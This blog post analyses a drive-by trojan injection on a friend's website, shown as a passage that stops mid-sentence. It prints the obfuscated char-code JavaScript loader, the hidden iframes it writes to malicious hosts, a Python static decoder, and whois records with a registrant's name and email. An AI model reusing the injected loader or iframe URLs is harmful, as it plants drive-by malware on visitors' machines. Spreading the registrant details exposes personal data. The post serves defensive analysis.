First published on my blog: http://www.areway.cn/?p=175

Over the weekend a friend, 鸭子, messaged me on QQ to say his site had been hit with a drive-by trojan (挂马). I didn't pay it much attention at the time and just opened the link directly; this is the page source I captured:
<script>t='60,105,102,114,97,109,101,
32,115,114,99,61,104,116,116,112,58,47,47,
102,114,101,101,46,117,45,117,117,117,46,99,
110,47,101,114,114,111,114,46,104,116,109,
32,119,105,100,116,104,61,49,48,48,32,104,
101,105,103,104,116,61,48,62,60,47,105,102,
114,97,109,101,62';
t=eval('String.fromCharCode('+t+')');document.write(t);</script>
<script>t='60,105,102,114,97,109,101,32,115,
114,99,61,104,116,116,112,58,47,47,102,114,
101,101,46,117,45,117,117,117,46,99,110,47,
101,114,114,111,114,46,104,116,109,32,119,
105,100,116,104,61,49,48,48,32,104,101,105,
103,104,116,61,48,62,60,47,105,102,114,97,
109,101,62';t=eval('String.fromCharCode('+t+')');
document.write(t);</script>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Published By Newasp.cc 2007-12-7-18:03:23 -->
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>首页 - 爱生活家庭网
The script above is a block of decimal-encoded characters: all of the char codes are stored in the variable t, decoded with String.fromCharCode via eval, and finally written into the page with document.write(t).

Roughly, the converted string is (click it at your own risk):

<script>t='<iframe src=http://free.u-uuu.cn/error.htm width=………
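As an added example (not code from the original post), here is a small Python decoder that does statically what the injected script does at runtime, without ever evaluating it: it finds the t='...'; eval(String.fromCharCode(...)); document.write(t) pattern in captured HTML, decodes the decimal list and pulls out each iframe src so it can be blocklisted or reported. The sample HTML is constructed from the payload captured above, and the function names are my own.

```python
import re

# Constructed sample: the injected block captured above, plus a bit of page around it.
SAMPLE_HTML = """<script>t='60,105,102,114,97,109,101,
32,115,114,99,61,104,116,116,112,58,47,47,
102,114,101,101,46,117,45,117,117,117,46,99,
110,47,101,114,114,111,114,46,104,116,109,
32,119,105,100,116,104,61,49,48,48,32,104,
101,105,103,104,116,61,48,62,60,47,105,102,
114,97,109,101,62';
t=eval('String.fromCharCode('+t+')');document.write(t);</script>
<html><head><title>home</title></head></html>"""

# The injection pattern: t='<decimal list>'; t=eval('String.fromCharCode('+t+')'); document.write(t)
# The list may span several lines; WordPress-style curly quotes are accepted as well as straight ones.
_INJECT_RE = re.compile(
    r"t\s*=\s*['\u2018\u2019\u2032]([0-9,\s]+)['\u2018\u2019\u2032]\s*;\s*"
    r"t\s*=\s*eval\([^)]*String\.fromCharCode[^;]*;\s*document\.write\(t\)",
    re.IGNORECASE,
)


def decode_charcode_list(codes: str) -> str:
    """Static equivalent of String.fromCharCode over a comma-separated decimal list."""
    return "".join(chr(int(n)) for n in codes.split(",") if n.strip())


def find_injected_payloads(html: str) -> list:
    """Return the decoded HTML that each matching script block would document.write()."""
    return [decode_charcode_list(m.group(1)) for m in _INJECT_RE.finditer(html)]


def iframe_sources(decoded: str) -> list:
    """Pull the src= of each iframe out of a decoded payload (quoted or bare values)."""
    return re.findall(r"<iframe[^>]*\bsrc=['\"]?([^'\"\s>]+)", decoded, re.IGNORECASE)


if __name__ == "__main__":
    for payload in find_injected_payloads(SAMPLE_HTML):
        print(payload, "->", iframe_sources(payload))
```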
Whois details for the domain u-uuu.cn:

Domain Name: u-uuu.cn
ROID: 20070901s10001s64972306-cn
Domain Status: ok
Registrant Organization: 王雷
Registrant Name: 王雷
Administrative Email: czlovexs@126.com
Sponsoring Registrar: 北京万网志成科技有限公司
Name Server: ns.yovole.com
Name Server: ns1.yovole.com
Registration Date: 2007-09-01 17:54
Expiration Date: 2008-09-01 17:54
Finally I pinged the address; nothing of note....

Continued the analysis in a virtual machine: opened the link above in IE, viewed the source, and found yet another nested injection straight away.

<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
<script language="javascript" src="http://count43.51yes.com/click.aspx?id=4333375720&logo=6"></script>

This domain is quite possibly the trojan author's own:
<